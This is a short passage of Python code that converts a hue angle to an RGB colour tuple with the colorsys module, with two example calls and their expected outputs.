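    r, g, b = colorsys.hsv_to_rgb(hue_degrees / 360.0, 1.0, 1.0)
    return int(r * 255), int(g * 255), int(b * 255)

print(hue_to_colour(0))    # (255, 0, 0)
print(hue_to_colour(120))  # (0, 255, 0)
```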